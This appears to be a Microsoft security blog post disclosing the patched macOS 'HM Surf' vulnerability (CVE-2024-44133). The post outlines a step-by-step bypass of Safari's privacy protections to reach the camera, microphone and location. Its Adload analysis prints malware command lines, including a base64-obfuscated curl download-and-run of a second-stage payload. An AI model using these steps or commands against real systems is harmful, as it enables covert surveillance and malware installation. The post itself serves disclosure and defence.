{"id":136092,"date":"2024-10-17T09:00:00","date_gmt":"2024-10-17T16:00:00","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?p=136092"},"modified":"2024-10-17T09:05:14","modified_gmt":"2024-10-17T16:05:14","slug":"new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/10\/17\/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access\/","title":{"rendered":"New macOS vulnerability, \u201cHM Surf\u201d, could lead to unauthorized data access"},"content":{"rendered":"\n

Microsoft Threat Intelligence uncovered a macOS vulnerability that could potentially allow an attacker to bypass the operating system\u2019s Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user\u2019s protected data. The vulnerability, which we refer to as “HM Surf”, involves removing the TCC protection for the Safari browser directory and modifying a configuration file in the said directory to gain access to the user’s data, including browsed pages, the device\u2019s camera, microphone, and location, without the user\u2019s consent.  <\/p>\n\n\n\n

After discovering the bypass technique, we shared our findings with Apple through Coordinated Vulnerability Disclosure (CVD)<\/a> via Microsoft Security Vulnerability Research (MSVR)<\/a>. Apple released a fix for this vulnerability, now identified as CVE-2024-44133, as part of security updates for macOS Sequoia<\/a>, released on September 16, 2024. At present, only Safari uses the new protections afforded by TCC. Microsoft is currently collaborating with other major browser vendors to investigate the benefits of hardening local configuration files.<\/p>\n\n\n\n

We encourage macOS users to apply these security updates as soon as possible. Behavior monitoring protections in Microsoft Defender for Endpoint has detected activity associated with Adload, a prevalent macOS threat family, potentially exploiting this vulnerability. Microsoft Defender for Endpoint detects and blocks CVE-2024-44133 exploitation, including anomalous modification of the Preferences file through HM Surf or other methods.<\/p>\n\n\n\n

We initially described TCC technology and how we were able to bypass it in our powerdir<\/a> vulnerability discovery. As a reminder, TCC is a technology that prevents apps from accessing users\u2019 personal information, including services such as location services, camera, microphone, downloads directory, and others, without their prior consent and knowledge. Formally, the only legitimate way for an app to gain access to those services is by approving a popup through the user interface, or by approving per-app access in the operating system\u2019s settings. In this blog post, we share details on how HM Surf can enable attackers to bypass TCC and access the said services without user consent. We also provide guidance for organizations to protect devices from successful exploitation.<\/p>\n\n\n\n

Safari entitlements and TCC<\/h2>\n\n\n\n

Entitlements, as we shared in a past blog post<\/a>, are privileges that macOS apps might have, and are digitally signed by Apple. Apple reserves some entitlements to their own applications, which are known as private entitlements. Such entitlements commonly start with the com.apple.private<\/em> prefix.<\/p>\n\n\n\n

When it comes to TCC, the com.apple.private.tcc.allow<\/em> entitlement allows the entitled app to completely bypass TCC checks for services that are mentioned under the entitlement. Safari, the default browser in macOS, has very powerful TCC entitlements, including com.apple.private.tcc.allow<\/em>:<\/p>\n\n\n

\"A
Figure 1. TCC entitlements and various information on Safari<\/figcaption><\/figure>\n\n\n\n

There are two important aspects here:<\/p>\n\n\n\n

    \n
  1. Safari can freely access the address book (kTCCServiceAddressBook<\/em>), camera (kTCCServiceCamera<\/em>), microphone (kTCCServiceMicrophone<\/em>), and more, completely bypassing TCC access checks for those services.<\/li>\n\n\n\n
  2. Safari is compiled with flags=0x2000 (library-validation), which means all dynamically loaded libraries must be digitally signed by the same Team ID. This feature could be considered a part of Apple\u2019s Hardened Runtime<\/a>, and hardens the app against certain type of attacks such as code injection<\/a>. The Hardened Runtime technology is in many aspects similar to the Windows process mitigation policies<\/a>, and essentially means an attacker is going to have a very hard time running arbitrary code in the context of Safari.<\/li>\n<\/ol>\n\n\n\n

    By default, when one browses a website that requires access to the camera or the microphone, a TCC-like popup still appears, which means Safari maintains its own TCC policy. That makes sense, since Safari must maintain access records on a per-origin (website) basis:<\/p>\n\n\n

    \"A
    Figure 2. TCC-like popup by Safari<\/figcaption><\/figure>\n\n\n\n

    We discovered that Safari maintains its configuration in various files under ~\/Library\/Safari<\/em> (the user\u2019s home directory). That said directory contains several files of interest, including the following:<\/p>\n\n\n\n

    Filename<\/strong><\/td>Description<\/strong><\/td>Remarks<\/strong><\/td><\/tr>
    AutoFillCorrections.db<\/td>A SQLite database containing autocorrections information.<\/td>Useful for information gathering, but not TCC-related.<\/td><\/tr>
    Downloads.plist<\/td>A configuration file containing metadata about downloads.<\/td>Useful for information gathering, but not TCC-related.<\/td><\/tr>
    History.db<\/td>A SQLite database containing the browsing history.<\/td>Useful for information gathering, but not TCC-related.<\/td><\/tr>
    PerSitePreferences.db<\/td>A SQLite database containing the per-site preferences. Also contains default TCC security preferences.<\/td>TCC-related, as it contains the default behavior for TCC service access.<\/td><\/tr>
    UserMediaPermissions.plist<\/td>A configuration file containing the permissions per site.<\/td>TCC-related, as it contains the TCC user choices per-origin.<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

    Therefore:<\/p>\n\n\n\n

      \n
    1. Reading arbitrary files from the directory allows attackers to gather extremely useful information (such as the user\u2019s browsing history).<\/li>\n\n\n\n
    2. Writing to the directory allows TCC bypasses, for instance, by overriding the PerSitePreferences.db<\/em>.<\/li>\n<\/ol>\n\n\n\n

      Apple\u2019s approach of protecting that directory with TCC is therefore very justified.<\/p>\n\n\n\n

      Exploitation<\/h2>\n\n\n\n

      Similar to the exploit we developed for powerdir, we noticed that sensitive files exist under the user\u2019s home directory. We concluded we could use a similar method to remove the protection for the ~\/Library\/Safari<\/em> directory.<\/p>\n\n\n\n

      Our exploit involves the following steps:<\/p>\n\n\n\n

        \n
      1. Change the home directory of the current user with the dscl<\/a> utility, which does not require TCC access in Sonoma (At this point, the ~\/Library\/Safari<\/em> directory is no longer TCC protected).<\/li>\n\n\n\n
      2. Modify the sensitive files under the user\u2019s real home directory (such as \/Users\/$USER\/Library\/Safari\/PerSitePreferences.db<\/em>).<\/li>\n\n\n\n
      3. Change the home directory again so Safari uses the now modified files.<\/li>\n\n\n\n
      4. Run Safari to open a webpage that takes a camera snapshot and trace device location.<\/li>\n<\/ol>\n\n\n\n

        In our exploit, we also reset the TCC permissions of the Terminal (using tccutil<\/a>) for the sake of demonstration.<\/p>\n\n\n\n

        We noticed that PerSitePreferences.db<\/em> is used only when a secure connection occurs (over HTTPS), but an attacker could host malicious JavaScript code over HTTPS.<\/p>\n\n\n\n

        The JavaScript code that takes the camera snapshot and retrieves location information is straightforward and is hosted here<\/a> (the code does not include the exploit). The most important part that usually requires TCC camera access is:<\/p>\n\n\n

        \"A
        Figure 3. Accessing the camera through JavaScript<\/figcaption><\/figure>\n\n\n
        \"A
        Figure 4. The contents of the PerSitePreferences.db file we used in our exploit show full access to camera, microphone, downloads, and geolocation.<\/figcaption><\/figure>\n\n\n\n

        We downloaded the snapshot in our demonstration, but in a real scenario, an attacker could do stealthy things, including:<\/p>\n\n\n\n

          \n
        1. Host the snapshot somewhere to be downloaded later privately.<\/li>\n\n\n\n
        2. Save an entire camera stream.<\/li>\n\n\n\n
        3. Record microphone and stream it to another server or upload it.<\/li>\n\n\n\n
        4. Get access to the device\u2019s location.<\/li>\n\n\n\n
        5. Start Safari in a very small window to not draw attention.<\/li>\n<\/ol>\n\n\n\n

          We called our exploit HM Surf<\/a> in reference to the HM03 (Surf) Safari zone and recorded a complete video of our exploit. Note how TCC access for Camera is not permitted, as well as Safari-specific controls do not automatically allow Camera access:<\/p>\n\n\n

          \n\t\n\t\t
          \n\t\t\t<\/iframe>\n\t\t<\/div>\n\t<\/div>\n\t\t\t
          \n\t\t\tFigure 5. Exploit code in action\t\t<\/figcaption>\n\t<\/figure>\n\n\n\n

          Third-party browsers<\/h2>\n\n\n\n

          Third-party browsers such as Google Chrome, Mozilla Firefox, or Microsoft Edge do not have the same private entitlements as Apple applications, which means that the said apps can\u2019t bypass TCC checks.<\/p>\n\n\n

          \"A
          Figure 6. Google Chrome first asking TCC access to the microphone via a “true” TCC popup that works at the app level.<\/figcaption><\/figure>\n\n\n\n

          Therefore, when an end-user runs a third-party browser to use a TCC service (such as the camera, microphone, or location) for the first time, a TCC popup will appear and ask for access to the resource. By design, the access approval happens at the app level rather than at a per-origin (the combination of schema, host name, and port number) level. Once access is approved to an app, it’s then up to that app to maintain their own database of approved origins for privacy and safety.<\/p>\n\n\n\n

          Detecting new Adload behavior via behavioral monitoring<\/h2>\n\n\n\n

          After discovering this new technique of bypassing TCC, we deployed behavior monitoring detection strategies to protect customers. In analyzing the intelligence gathered from the detection strategies, we observed a suspicious activity in a customer’s device: a process by the name of p<\/em> running from the \/private\/tmp<\/em> world-writable folder (SHA-256: 17e1b83089814128bc243315894f412026503c10b710c9c59d4aaf67bc209cb8) that anomalously modified the local user\u2019s Chrome Preferences file.<\/p>\n\n\n\n

          Upon further examination, we discovered the parent process was running with the following command line:<\/p>\n\n\n\n

          \/Users\/<username>\/Library\/Application Support\/.17066225541972342347\/Services\/com.BasicIndex.service\/BasicIndex.service” -s 6600<\/em><\/p>\n\n\n\n

          The com.BasicIndex.service<\/em> folder name is a fake macOS service attributed to Adload<\/a>, a prevalent macOS threat family we have described in the past<\/a>.<\/p>\n\n\n\n

          These are the behaviors we discovered:<\/p>\n\n\n\n

          TTPs<\/strong><\/td>Description<\/strong><\/td><\/tr>
          T1082 \u2013 System Information Discovery<\/a><\/td>Running the command: sh -c “sw_vers -productVersion”<\/em> To detect the current macOS version.<\/td><\/tr>
          T1033 \u2013 System Owner\/User Discovery<\/a><\/td>Running the command: \/usr\/bin\/id -u <username><\/em> To get the user ID of the given username. The username was reducted for privacy reasons.<\/td><\/tr>
          T1059.002 – Command and Scripting Interpreter: AppleScript<\/a> T1059.004 – Command and Scripting Interpreter: Unix Shell<\/a><\/td>Running the command: \/usr\/bin\/osascript -e ‘do shell script “touch ‘\/tmp\/GmaNi4v50ekNZSI'” user name “<username>” password <password> as string) with administrator privileges’<\/em> To get an extra verification the correct user\u2019s password was collected.<\/td><\/tr>
          T1068 – Exploitation for Privilege Escalation<\/a><\/td>Adding the following URL to the Microphone and Camera approved lists in the local user\u2019s Chrome Preferences file: hxxps:\/\/localhost:4444<\/em> This is potentially done as a means to bypass TCC.<\/td><\/tr>
          T1140 – Deobfuscate\/Decode Files or Information<\/a> T1059.004 – Command and Scripting Interpreter: Unix Shell<\/a> T1071.001 \u2013 Application Layer Protocol: Web Protocols<\/a> T1222.002 – File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification<\/a><\/td>Running the following base64-obfuscated script: \/bin\/zsh -c “echo -e WFVNS2JXNnNTM3c9J3RtcD0iJChta3R<reduced for brievty> | base64 -D | \/bin\/bash” After base64-decoding and script de-obfuscation, it turns into: tmp=”$(mktemp \/tmp\/XXXXXXXX)”; curl –retry 5 -f “hxxp:\/\/api.inetprogress.com\/plg?u=B2874734-0534-5274-9025-3EDB3F160B34” -o “${tmp}”; if [[ -s “${tmp}” ]]; then chmod 777 “${tmp}”; “${tmp}”; fi; rm “${tmp}”<\/em> Which simply downloads a second stage script and runs it.<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

          Since we weren’t able to observe the steps taken leading to the activity, we can’t fully determine if the Adload campaign is exploiting the HM surf vulnerability itself. Attackers using a similar method to deploy a prevalent threat raises the importance of having protection against attacks using this technique.<\/p>\n\n\n\n

          Microsoft Defender for Endpoint uses advanced behavioral analytics and machine learning to detect anomalous activities on a device and can detect this kind of malicious behavior, including anomalous modification of the Preferences file through HM Surf or other methods.<\/p>\n\n\n

          \"A
          Figure 7. Prevention of anomalous modifications to browser files. Note this is a generic detection and does not only fit Adload campaigns.<\/figcaption><\/figure>\n\n\n\n

          Hardening device security through vulnerability management and behavioral monitoring<\/h2>\n\n\n\n

          Continuous research on vulnerabilities in security technologies like TCC in macOS devices is important to help ensure that user data is protected from unauthorized access. Software vendors are always in a tight race against malicious actors to discover vulnerabilities and address them before they are exploited for attacks. The discoveries and insights from our research, including vulnerabilities such as Migraine<\/a>, powerdir<\/a>, and Shrootless<\/a>, enrich our protection technologies and solutions such as Microsoft Defender for Endpoint<\/a>, which allows organizations to quickly discover and remediate vulnerabilities in their networks that are increasingly becoming heterogeneous.<\/p>\n\n\n\n

          In addition, Microsoft Defender for Endpoint uses advanced behavioral analytics and machine learning to detect anomalous activities on a device, such as creating spoofed home directories, a technique which was previously used in other vulnerabilities. In the example provided in the previous section, Microsoft Defender for Endpoint detects modifications to the Safari private directory, as well as private directories of third-party browsers, as suspicious. Extending the concept, Defender for Endpoint has similar detections for sensitive file access (including Safari-specific settings) by a non-Safari application.<\/p>\n\n\n\n

          Apple has also introduced new APIs<\/a> for App Group Containers that make SIP (System Integrity Policy) that protect configuration files from being modified by an external attacker, resolving the vulnerability class. At present, only Safari uses the new protections afforded by TCC. Microsoft is currently collaborating with other major browser vendors to investigate the benefits of hardening local configuration files. While Chromium and Firefox is yet to adopt the new APIs, Chromium is moving towards using os_crypt<\/a> which solves the attack in a different way.<\/p>\n\n\n\n

          Microsoft continues to monitor the threat landscape to discover new vulnerabilities and attacker techniques that could affect macOS and other non-Windows devices. As cross-platform threats continue to increase, a coordinated response to vulnerability discoveries and other forms of threat intelligence sharing will help enrich protection technologies that secure users\u2019 computing experience regardless of the platform or device they\u2019re using.<\/p>\n\n\n\n

          References<\/h2>\n\n\n\n